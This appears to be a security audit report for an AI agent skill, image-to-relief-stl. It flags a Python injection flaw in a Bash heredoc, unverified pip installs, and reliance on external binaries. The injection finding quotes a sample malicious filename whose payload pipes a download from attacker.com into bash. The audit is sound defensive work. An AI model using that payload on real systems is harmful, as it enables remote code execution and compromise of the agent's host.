The Agent Skills Directory

[REMOTE_CODE_EXECUTION] (CRITICAL): The script scripts/image_to_relief.sh is vulnerable to arbitrary Python code injection.
Evidence: Lines 86-101 in scripts/image_to_relief.sh use a Bash heredoc (<<PY) to generate and execute a Python script. Because the delimiter PY is not quoted, Bash performs variable expansion on the $IN variable inside the Python source code string.
Impact: An attacker who can control the input filename (e.g., providing a filename like "; import os; os.system('curl http://attacker.com/shell | bash'); #) can execute arbitrary commands with the privileges of the agent.
[EXTERNAL_DOWNLOADS] (MEDIUM): The skill performs unverified runtime installation of Python packages.
Evidence: scripts/image_to_relief.sh (line 72) executes pip install pillow during the setup phase.
Risk: This introduces a dependency on the PyPI registry at runtime and could be exploited via dependency confusion or typosquatting if the package name were less common.
[COMMAND_EXECUTION] (LOW): The skill relies on and executes external system binaries.
Evidence: The skill requires and calls potrace and mkbitmap for SVG generation.
Risk: While standard for the skill's stated purpose, it increases the attack surface if these external binaries have their own vulnerabilities when processing malicious image data.

image-to-relief-stl